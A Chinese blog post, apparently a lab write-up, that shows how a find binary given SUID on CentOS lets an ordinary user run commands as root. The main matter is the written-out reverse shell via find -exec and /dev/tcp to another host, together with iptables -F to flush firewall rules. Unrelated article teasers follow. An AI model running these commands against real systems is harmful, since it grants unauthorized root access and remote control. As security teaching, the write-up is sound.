centos利用find提权反弹shell

需要说明的是利用find命令进行提权的方式已经不存在了,因为Linux默认不会为find命令授予suid权限,这里只是刻意的制造出了一种存在提权的环境

首先我们先介绍一下find命令,find命令主要用来在Linux中查找文件使用,它可以进行最基础的打印操作,还可以根据文件的名称、类型、事假戳、大小、权限等来查找指定的文件。

利用find反弹shell实现提权主要依靠的就是find命令如果有suid的权限,那么在执行find命令的一瞬间会拥有root权限,又因为find命令可以使用执行的操作,所以有很大的危害。

那么我们现在就复现一下:
(1)首先可以查看一下find命令的权限

ls -al /usr/bin/find

可以看到并没有suid(s)权限

(2)那么我现在手动的为find授予suid的权限

chmod  u+s /usr/bin/find

我们再查看find的权限就会发现它已经有了s权限

(3)因为我现在还是在root用户下,始终是root权限,无法观察find命令提权的过程,我现在切换到一个普通的用户下:

su user1

(4)那么现在就可以测试一下find命令执行时会不会提升到root权限

find /etc/passwd -exec whoami \;

可以看到这里和我设想的一样,在find命令执行的一瞬间是root权限

 (5)那么这是我在另一台centos对12345端口进行监听

nc -lvvp 12345

(5)这时我尝试在centos1上执行操作,尝试进行反弹shell

find  /etc/passwd -exec bash -ip >&/dev/tcp/192.168.159.201/12345 0>&1 \;

 可以看到并没有成功,难道因为我们没有到192.168.159.201的路由吗,我们可是一个网段呀,那我就用ping命令看看

很明显可以ping通呀,那为什么在尝试执行时会报错说没有路由呢

(6)我想会不会是因为防火墙的原因,于是我在两台主机上都清除了防火墙的规则

iptables -F

(7)然后再次尝试

可以看到centos1成功的利用find的这样一个漏洞反弹到了centos2的shell

(8)我们可以查看一下ip地址看看是否为centos1

可以看到这就是我的centos1设备的ip地址

到这里使用find来实现反弹shell的漏洞就复现完成了

注:给find增加suid增加只是为了实验,记着做完实验后去除find的suid权限

chmod u-s /usr/bin/find

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/171418.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

html5 初步了解

1、html5 含义 简而言之,html5 其实就是新的一代html标准! 2、html5的优缺点 优点 语义化html 增加了很多语义化的标签,让html结构更加清晰,更具可读性由于增加了很多语义化的标签,对SEO更加友好 缺点 其他主流浏…

node插件MongoDB(四)—— 库mongoose 的个性话读取(字段筛选、数据排序、数据截取)(四)

文章目录 一、字段筛选二、数据排序三、数据截取1. skip 跳过2. limit 限定![在这里插入图片描述](https://img-blog.csdnimg.cn/c7067b1984ee4c6686f8bbe07cae9176.png) 一、字段筛选 字段筛选:只读取指定的数据,比如集合(表)中有…

如何在电脑和手机设备上编辑只读 PDF

我们大多数人更喜欢以 PDF 格式共享和查看文件,因为它更专业、更便携。但是,通常情况下您被拒绝访问除查看之外的内容编辑、复制或评论。如果您希望更好地控制您的 PDF 或更灵活地编辑它,请弄清楚为什么您的 PDF 是只读的,然后使用…

微信小程序:仅前端实现对象数组的模糊查询

效果 核心代码 //对数组进行过滤&#xff0c;返回数组中每一想满足name值包括变量query的 let result array.filter(item > { return item.name.includes(query); }); 完整代码 wxml <input type"text" placeholder"请输入名称" placeholder-styl…

基因检测技术的发展与创新:安全文件数据传输的重要作用

基因是生命的密码&#xff0c;它决定了我们的身体特征、健康状况、疾病风险等。随着基因检测技术的高速发展&#xff0c;我们可以通过对基因进行测序、分析和解读&#xff0c;更深入地认识自己&#xff0c;预防和治疗各种遗传性疾病&#xff0c;甚至实现个性化医疗和精准健康管…

Mysql基本知识

1.SQL分类 DDL【data definition language】 数据定义语言&#xff0c;用来维护存储数据的结构 代表指令: create, drop, alter DML【data manipulation language】 数据操纵语言&#xff0c;用来对数据进行操作 代表指令&#xff1a; insert&#xff0c;delete&#xff0c;up…

LLM大语言模型(典型ChatGPT)入门指南

文章目录 一、基础概念学习篇1.1 langchain视频学习笔记1.2 Finetune LLM视频学习笔记 二、实践篇2.1 预先下载模型&#xff1a;2.2 LangChain2.3 Colab demo2.3 text-generation-webui 三、国内项目实践langchain-chatchat 一、基础概念学习篇 1.1 langchain视频学习笔记 lan…

【设计原则篇】聊聊开闭原则

开闭原则 其实就是对修改关闭&#xff0c;对拓展开放。 是什么 OCP&#xff08;Open/Closed Principle&#xff09;- 开闭原则。关于开发封闭原则&#xff0c;其核心的思想是&#xff1a;模块是可扩展的&#xff0c;而不可修改的。也就是说&#xff0c;对扩展是开放的&#xf…

【现场问题】datax中write部分为Oracle的时候插入clolb类型字段,插入的数据为string且长度过场问题

datax的Oraclewriter 报错显示查询报错展示查找datax中的数据插入模块 报错显示 occurred during batching: ORA-01704: string literal too long 查询报错展示 基本上查到的都是这样的&#xff0c;所以锁定是clob的字段类型的问题&#xff0c;而且是只有Oracle出问题&#…

<MySQL> MySQL中查询(retrieve)数据的基础操作

目录 一、查询&#xff08;retrieve&#xff09; 1.1 查询数据的方式概述 二、全列查询 2.1 语法 2.2 操作演示 2.3 全列查询需要慎重使用 三、指定列查询 3.1 语法 3.2 操作演示 四、表达式查询 4.1 语法 4.2 操作演示 4.3 null 参与表达式计算 4.3 表达式查询存…

创建maven的 java web项目

创建maven的 java web项目 创建出来的项目样子 再添加java和resources文件夹 一定要如图有文件夹下有图标才代表被IDEA识别&#xff0c;不让是不行的 没有的话在File——ProjectStructure中进行设置

【Python Opencv】Opencv画图形

文章目录 前言一、画图形1.1 画线1.2 画矩形1.3 画圆1.4 画椭圆1.5 添加文本 总结 前言 在计算机视觉和图像处理中&#xff0c;OpenCV不仅可以处理图像和视频&#xff0c;还提供了一组功能强大的工具&#xff0c;用于在图像上绘制各种形状和图形。这些功能使得我们能够在图像上…